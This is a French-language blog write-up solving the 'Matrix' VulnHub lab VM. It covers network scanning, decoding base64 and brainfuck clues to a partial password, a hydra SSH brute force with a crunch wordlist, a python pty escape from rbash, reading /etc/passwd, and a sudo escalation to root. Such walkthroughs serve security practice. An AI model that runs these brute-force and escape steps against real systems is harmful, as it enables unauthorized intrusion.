Matrix vulnhub.com

2019/01/26 :

Une nouvelle VM de chez vulnhub.com :

le lien ici :

ariokio@GB-BXBT-1900:~/Documents/VM/vulnhub$ wget https://download.vulnhub.com/matrix/Machine_Matrix.zip

=============

En premier un recon du réseau avec mon script :

root@aridebsec:~/Documents# ./all_live_hosts.sh 10.0.1.0/24

xx-xxx-2 (10.0.1.1)

attacker (10.0.1.41)

porteus (10.0.1.72) : la victime ?

=============

Un scan nmap pour identifier les ports et services de la machine :

# Nmap 7.70 scan initiated Sat Jan 26 18:23:48 2019 as: nmap -sC -sV -A -oA Matrix_nmap 10.0.1.72

Nmap scan report for porteus (10.0.1.72)

Host is up (0.0022s latency).

Not shown: 997 closed ports

PORT STATE SERVICE VERSION

22/tcp open ssh OpenSSH 7.7 (protocol 2.0)

| ssh-hostkey:

| 2048 9c:8b:c7:7b:48:db:db:0c:4b:68:69:80:7b:12:4e:49 (RSA)

| 256 49:6c:23:38:fb:79:cb:e0:b3:fe:b2:f4:32:a2:70:8e (ECDSA)

|_ 256 53:27:6f:04:ed:d1:e7:81:fb:00:98:54:e6:00:84:4a (ED25519)

80/tcp open http SimpleHTTPServer 0.6 (Python 2.7.14)

|_http-server-header: SimpleHTTP/0.6 Python/2.7.14

|_http-title: Welcome in Matrix

31337/tcp open http SimpleHTTPServer 0.6 (Python 2.7.14)

|_http-server-header: SimpleHTTP/0.6 Python/2.7.14

|_http-title: Welcome in Matrix

MAC Address: 08:00:27:E5:B2:AA (Oracle VirtualBox virtual NIC)

Device type: general purpose

Running: Linux 3.X|4.X

OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4

OS details: Linux 3.2 – 4.9

Network Distance: 1 hop

TRACEROUTE

HOP RTT ADDRESS

1 2.16 ms porteus (10.0.1.72)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .

# Nmap done at Sat Jan 26 18:24:24 2019 — 1 IP address (1 host up) scanned in 37.18 seconds

Donc on a le port 22, 80, 31337, le dernier est une commande python SimpleHTTPServer… On dirait

On va voir le port 80 et le port 31337 via un navigateur.

Le port 80 ouvre un site avec un compteur, mais le compteur ne défile pas. Rien dans le code source.

Une page un peu différente pour le port 31337 : cette fois dans le code source on a :

b

Cypher

« You know.. I know this steak doesn’t exist. I know when I put it in my mouth; the Matrix is telling my brain that it is juicy, and delicious. After nine years.. you know what I realize? Ignorance is bliss. »

</div>

</div>

<!– service –>

<!– End / service –>

Tiens tiens :

un petit coup de decode base64 (qui ne tente rien n’a rien) :

root@aridebsec:~/Documents/Matrix_vulnhub# echo « ZWNobyAiVGhlbiB5b3UnbGwgc2VlLCB0aGF0IGl0IGlzIG5vdCB0aGUgc3Bvb24gdGhhdCBiZW5kcywgaXQgaXMgb25seSB5b3Vyc2VsZi4gIiA+IEN5cGhlci5tYXRyaXg= » | base64 -d

echo « Then you’ll see, that it is not the spoon that bends, it is only yourself.  » > Cypher.matrix

Ok mais ça veut dire quoi ça ????? Ok après quelques minutes de réflexion : et si on ajoutait ça dansl’URL… 😉

La on va downloader un fichier… Cool allons-y…

root@aridebsec:~/Documents/Matrix_vulnhub# file Cypher.matrix

Cypher.matrix: ASCII text

root@aridebsec:~/Documents/Matrix_vulnhub# stat Cypher.matrix

File: Cypher.matrix

Size: 4121 Blocks: 16 IO Block: 4096 regular file

Device: 801h/2049d Inode: 2228603 Links: 1

Access: (0644/-rw-r–r–) Uid: ( 0/ root) Gid: ( 0/ root)

Access: 2019-01-26 18:52:33.341345750 -0500

Modify: 2019-01-26 18:51:31.485346015 -0500

Change: 2019-01-26 18:51:46.401345951 -0500

Birth: –

Rien de particulier c’est un fichier ASCII.

On l’ouvre et on a un fichier de type brainfuck contenant : (extrait) :

+++.< +++[- >+++< ]>+++ .+++. .<+++ [->– -<]>- —.- -.<++ ++[-> ++++<

]>+.< +++++ ++++[ ->— —– -<]>- –.<+ +++++ +++[- >++++ +++++ <]>++

.+.– .—- —– .++++ +.— —-. <++++ ++++[ ->— —– <]>– —–

.<+++ +++++ [->++ +++++ +<]>+ +++++ +++++ ++++. —– —-. <++++ ++++[

->— —– <]>– —-. <++++ ++++[ ->+++ +++++ <]>++ +++++ +++++ ++++.

<+++[ ->— <]>– —-. <++++ [->++ ++<]> ++..+ +++.- —– –.++ +.<++

+[->- –<]> —– .<+++ ++++[ ->— —-< ]>— –.<+ ++++[ ->— –<]>

—– —.- –.<

On va sur le site : https://www.dcode.fr/brainfuck-language

Qui nous traduit le code en :

You can enter into matrix as guest, with password k1ll0rXX

Note: Actually, I forget last two characters so I have replaced with XX try your luck and find correct string of password.

Ok, donc a on : du SSH, du HTTP, on a un port 31337 qui nous donnes accès à un fichier qui une fois télécharger et decoder nous donne

un user « guest » et une partie d’un mot de passe… Well well… Comme le dit le texte il manque deux carractères dans le mot de passe.

On va se creer un dictionnaire potentiel en complétant les deux carractères via l’outil crewl (déjà utiliser dans le challenge de la

machine MrRobot) :

root@aridebsec:~/Documents/Matrix_vulnhub# crunch 8 8 -t k1ll0r%@ -o dict.txt

Crunch will now generate the following amount of data: 2340 bytes

0 MB

0 GB

0 TB

0 PB

Crunch will now generate the following number of lines: 260

crunch: 100% completed generating output

Ensuite et bien vu que le HTTP ne donne rien on va sur le port 22 et on tente le coup :

root@aridebsec:~/Documents/Matrix_vulnhub# hydra -l guest -P dict.txt 10.0.1.72 ssh

Hydra v8.8 (c) 2019 by van Hauser/THC – Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2019-01-26 19:12:06

[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4

[DATA] max 16 tasks per 1 server, overall 16 tasks, 260 login tries (l:1/p:260), ~17 tries per task

[DATA] attacking ssh://10.0.1.72:22/

[STATUS] 180.00 tries/min, 180 tries in 00:01h, 84 to do in 00:01h, 16 active

[22][ssh] host: 10.0.1.72 login: guest password: k1ll0r7n

1 of 1 target successfully completed, 1 valid password found

[WARNING] Writing restore file because 3 final worker threads did not complete until end.

[ERROR] 3 targets did not resolve or could not be connected

[ERROR] 16 targets did not complete

Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2019-01-26 19:13:14

root@aridebsec:~/Documents/Matrix_vulnhub#

Donc on a un user et un mot de passe :

guest : k1ll0r7n

connexion SSH donc sur la victime :

root@aridebsec:~/Documents/Matrix_vulnhub# ssh guest@10.0.1.72

The authenticity of host ‘10.0.1.72 (10.0.1.72)’ can’t be established.

ECDSA key fingerprint is SHA256:BMhLOBAe8UBwzvDNexM7vC3gv9ytO1L8etgkkIL8Ipk.

Are you sure you want to continue connecting (yes/no)? yes

Warning: Permanently added ‘10.0.1.72’ (ECDSA) to the list of known hosts.

guest@10.0.1.72’s password:

Last login: Mon Aug 6 16:25:44 2018 from 192.168.56.102

guest@porteus:~$ ls

-rbash: /bin/ls: restricted: cannot specify `/’ in command names

guest@porteus:~$ ls -l

-rbash: /bin/ls: restricted: cannot specify `/’ in command names

guest@porteus:~$ ll

-rbash: /bin/ls: restricted: cannot specify `/’ in command names

guest@porteus:~$ cd

-rbash: cd: restricted

guest@porteus:~$ ls

-rbash: /bin/ls: restricted: cannot specify `/’ in command names

guest@porteus:~$

Ok, ok…

en faisant une tabulation :

guest@porteus:~$

! bg command dirs enable fc help let mcedit readonly suspend type vi

./ bind compgen disown esac fg history ll popd return test typeset wait

: break complete do eval fi if local printf select then ulimit while

[ builtin compopt done exec for in logout pushd set time umask {

[[ caller continue echo exit function jobs ls pwd shift times unalias }

]] case coproc elif export getopts kill mapfile read shopt trap unset

alias cd declare else false hash la mc readarray source true until

guest@porteus:~$ echo $PATH

/home/guest/prog

guest@porteus:~$ echo /home/guest/prog/*

/home/guest/prog/vi

guest@porteus:~$ echo $SHELL

/bin/rbash

guest@porteus:~$

Mais fuck quoi ce shell restreint….

Merci Gotmilk :

root@aridebsec:~/Documents/Matrix_vulnhub# ssh guest@10.0.1.72 « export TERM=xterm; python -c ‘import pty; pty.spawn(\ »/bin/bash\ »)' »

guest@10.0.1.72’s password:

guest@porteus:~$ cat /etc/passwd

cat /etc/passwd

root:x:0:0::/root:/bin/bash

bin:x:1:1:bin:/bin:/bin/false

daemon:x:2:2:daemon:/sbin:/bin/false

adm:x:3:4:adm:/var/log:/bin/false

lp:x:4:7:lp:/var/spool/lpd:/bin/false

sync:x:5:0:sync:/sbin:/bin/sync

shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown

halt:x:7:0:halt:/sbin:/sbin/halt

mail:x:8:12:mail:/:/bin/false

news:x:9:13:news:/usr/lib/news:/bin/false

uucp:x:10:14:uucp:/var/spool/uucppublic:/bin/false

operator:x:11:0:operator:/root:/bin/bash

games:x:12:100:games:/usr/games:/bin/false

ftp:x:14:50::/home/ftp:/bin/false

smmsp:x:25:25:smmsp:/var/spool/clientmqueue:/bin/false

mysql:x:27:27:MySQL:/var/lib/mysql:/bin/false

rpc:x:32:32:RPC portmap user:/:/bin/false

sshd:x:33:33:sshd:/:/bin/false

gdm:x:42:42:GDM:/var/lib/gdm:/sbin/nologin

oprofile:x:51:51:oprofile:/:/bin/false

usbmux:x:52:83:User for usbmux daemon:/var/empty:/bin/false

sddm:x:64:64:User for SDDM:/var/empty:/bin/false

pulse:x:65:65:User for PulseAudio:/var/run/pulse:/bin/false

apache:x:80:80:User for Apache:/srv/httpd:/bin/false

messagebus:x:81:81:User for D-BUS:/var/run/dbus:/bin/false

haldaemon:x:82:82:User for HAL:/var/run/hald:/bin/false

pop:x:90:90:POP:/:/bin/false

nobody:x:99:99:nobody:/:/bin/false

guest:x:1000:100:,,,:/home/guest:/bin/rbash

vboxadd:x:999:1::/var/run/vboxadd:/bin/false

colord:x:72:72:Color Daemon Owner:/var/lib/colord:/bin/false

polkitd:x:28:28:PolicyKit Daemon Owner:/etc/polkit-1:/bin/false

trinity:x:1001:1001::/home/trinity:/bin/bash

guest@porteus:~$ sudo -l

sudo -l

User guest may run the following commands on porteus:

(ALL) ALL

(root) NOPASSWD: /usr/lib64/xfce4/session/xfsm-shutdown-helper

(trinity) NOPASSWD: /bin/cp

guest@porteus:~$ sudo /bin/bash

sudo /bin/bash

Password:

There’s a lot of it about, you know.

Password:

Ying Tong Iddle I Po

Password: k1ll0r7n

root@porteus:/home/guest#

root@porteus:/home/guest# id

id

uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)

root@porteus:/home/guest#

Game over !!!!! Je suis root

root@porteus:/home/guest# ls

ls

Desktop/ Documents/ Downloads/ Music/ Pictures/ Public/ Videos/ prog/

root@porteus:/home/guest# cd

cd

root@porteus:~# ls

ls

Desktop/ Documents/ Downloads/ Music/ Pictures/ Public/ Videos/ flag.txt

root@porteus:~# cat flag .txt

cat flag.txt

_,-.

,-‘ _| EVER REWIND OVER AND OVER AGAIN THROUGH THE

|_,-O__`-._ INITIAL AGENT SMITH/NEO INTERROGATION SCENE

|`-._\`.__ `_. IN THE MATRIX AND BEAT OFF

|`-._`-.\,-‘_| _,-‘.

`-.|.-‘ | |`.-‘|_ WHAT

| |_|,-‘_`.

|-._,-‘ | NO, ME NEITHER

jrei | | _,’

‘-|_,-‘ IT’S JUST A HYPOTHETICAL QUESTION